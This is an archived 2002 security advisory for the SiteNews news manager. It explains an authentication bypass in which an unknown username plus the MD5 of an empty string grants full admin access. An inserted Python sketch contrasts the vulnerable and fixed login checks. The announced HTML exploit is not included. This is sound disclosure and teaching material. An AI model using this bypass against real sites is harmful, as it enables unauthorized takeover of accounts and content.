SiteNews remote add user exploit

From: Ulf Härnhammar (ulfhat_private)
Date: Sat Feb 16 2002 - 09:46:35 PST

    SiteNews remote add user exploit
    
    PROGRAM: SiteNews
    AUTHOR: JP Durman (jpat_private)
    HOMEPAGE: http://www.linuxnetwork.nl/
    VULNERABLE VERSIONS: 0.10 and 0.11 (possibly older versions as well)
    TYPE: remote add user exploit
    SEVERITY: high
    
    DESCRIPTION:
    
    SiteNews is an open-source system for displaying and managing news items on
    websites. According to its homepage, it has been downloaded almost 4000 times.
    
    ISSUE:
    
    The function GetPassword in function.php returns an empty string when asked
    for a non-existent username. Because the program sends usernames in
    cleartext and passwords as MD5 sums, you can log in without an account by
    posting a non-existent username and the MD5 sum of an empty string as the
    password. SiteNews has no concept of user levels, so once you are in, you
    have full control over all news items and all users.
    
    The author was contacted with an explanation, an exploit and a patch on the
    5th of February. Version 0.12, which is not vulnerable, was released on the
    7th of February.
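The flaw described above is a "not found" sentinel that is also a valid comparison input. The following Python model is an added example, not SiteNews code or the 0.12 patch: the user store, the function names other than the GetPassword analogue, and the assumption that the server hashes the looked-up password before comparing are all hypothetical.

```python
import hashlib
import hmac

# Constructed user store (assumption: the advisory does not describe storage).
USERS = {"editor": "s3cret-news"}


def md5_hex(text):
    """Hex MD5 of a string, the form in which the client submits passwords."""
    return hashlib.md5(text.encode()).hexdigest()


EMPTY_MD5 = md5_hex("")  # the digest any client can compute without an account


def get_password(username):
    """Analogue of GetPassword: unknown users yield "" rather than an error."""
    return USERS.get(username, "")


def login_vulnerable(username, password_md5):
    # "" for a missing user is hashed like a real password, so the
    # comparison succeeds for (unknown user, MD5 of empty string).
    return password_md5 == md5_hex(get_password(username))


def login_fixed(username, password_md5):
    stored = USERS.get(username)  # None means "no such user"
    if not stored:
        # Reject unknown users and accounts with an empty password
        # before any digest is compared.
        return False
    expected = md5_hex(stored)
    return hmac.compare_digest(password_md5.encode(), expected.encode())


if __name__ == "__main__":
    for name, fn in (("vulnerable", login_vulnerable), ("fixed", login_fixed)):
        print(name, "unknown user + empty digest ->", fn("no-such-user", EMPTY_MD5))
        print(name, "real user + correct digest  ->", fn("editor", md5_hex("s3cret-news")))
```

The same check is useful in code review: any lookup that signals "no such user" with a value that can also be a legitimate credential (empty string, zero, null hash) needs an explicit existence test before the comparison.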
    
    RECOMMENDATION:
    
    I recommend that all users upgrade to version 0.12 immediately.
    
    EXPLOIT:
    
    Here is my HTML exploit for this issue. It is uuencoded. You type in a non-
    existent username and the user and password combination that you wish to add
    to the system, and the exploit creates the new user for you, despite the fact
    that you are not authorized.
    
    // Ulf Harnhammar
    metaurat_private
    
    
    


